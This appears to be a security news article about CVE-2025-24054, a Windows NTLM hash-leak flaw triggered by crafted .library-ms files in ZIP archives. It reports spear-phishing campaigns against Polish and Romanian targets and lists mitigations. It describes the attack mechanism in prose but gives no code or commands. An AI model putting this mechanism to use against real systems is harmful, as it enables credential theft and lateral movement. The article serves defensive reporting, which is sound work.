This vulnerability leverages NTLM hash disclosure through spoofing techniques.
This vulnerability, related to NTLM (New Technology LAN Manager) authentication protocols, has become a significant threat, enabling attackers to leak NTLM hashes and potentially escalate privileges or move laterally within compromised networks.
NTLM is a suite of authentication protocols developed by Microsoft to verify user identities and secure network communications. While NTLMv2 offers improved security over earlier versions, vulnerabilities still exist, especially when attackers can manipulate how hashes are transmitted or disclosed.
CVE-2025-24054 specifically involves the external control of file names or paths in Windows, allowing malicious actors to trigger SMB (Server Message Block) authentication requests that leak NTLMv2-SSP hashes during routine file operations.
Microsoft released a security patch for CVE-2025-24054 on March 11, 2025. The flaw is triggered when a user extracts a ZIP archive containing a malicious .library-ms file, which causes Windows Explorer to initiate an SMB authentication request to a remote server.
This process inadvertently leaks the userβs NTLM hash, which attackers can then capture for further malicious activities. Notably, the exploit can be triggered with minimal user interaction, such as right-clicking, dragging, dropping, or simply navigating to a folder containing the malicious file.
Active Exploitation of Vulnerability in the WildDespite the patch, threat actors began exploiting CVE-2025-24054 within days of its release. Check Point Research first observed malicious campaigns leveraging this flaw around March 20β21, 2025.
These campaigns targeted government and private institutions, primarily in Poland and Romania, using spear-phishing emails containing ZIP archives and embedded malicious files.
Check Point told Cyber Security News that once victims downloaded and interacted with these files, such as unzipping or clicking them, the exploit was triggered, leading to the leak of NTLM hashes.
The malicious archives contained files, including .library-ms, .url, .website, and .lnk files, all designed to initiate SMB connections to attacker-controlled servers. These connections exposed NTLMv2-SSP hashes, which attackers could then use to perform pass-the-hash attacks, relay attacks, or escalate privileges within the network.
The campaigns appeared highly targeted, with the primary goal of harvesting NTLM hashes for subsequent use in lateral movement or privilege escalation.
The collected hashes were sent to malicious SMB servers hosted in various countries, including Russia, Bulgaria, the Netherlands, Australia, and Turkey. The use of such techniques underscores the sophistication of the threat actors, believed to be linked to state-sponsored groups with advanced capabilities.
One notable campaign involved distributing malicious files via email links from Dropbox, which, when interacted with, exploited the vulnerability to leak hashes.
The campaignβs focus on government agencies in Poland and Romania highlights the geopolitical significance and potential for espionage or sabotage.
The exploit hinges on Windows Explorerβs handling of ZIP archives containing malicious files. When a user extracts such an archive, Windows initiates SMB authentication requests to remote servers specified within the malicious files.
These requests leak NTLMv2-SSP hashes without requiring extensive user interaction, making the attack particularly insidious. Attackers can then use these hashes to authenticate as legitimate users, often with high privileges, enabling lateral movement and network compromise.
Mitigations
Microsoftβs prompt patching of CVE-2025-24054 was a crucial step; however, the rapid exploitation indicates that organizations must act swiftly to mitigate risks. Key recommendations include:
Applying patches immediately: Ensure all affected systems are updated to the latest security patches.Enhancing network defenses: Implement SMB signing, relay protections, and monitor SMB traffic for unusual activity.User awareness: Educate users about the risks of opening untrusted archives or clicking on suspicious files.Network segmentation: Limit SMB traffic between segments to reduce the attack surface.Regular security audits: Conduct vulnerability assessments and monitor for signs of compromise.The exploitation of CVE-2025-24054 exemplifies how attackers leverage seemingly benign file operations to leak sensitive authentication hashes, facilitating deeper infiltration into target networks.
The swift transition from patch release to active exploitation underscores the importance of rapid response and proactive security measures.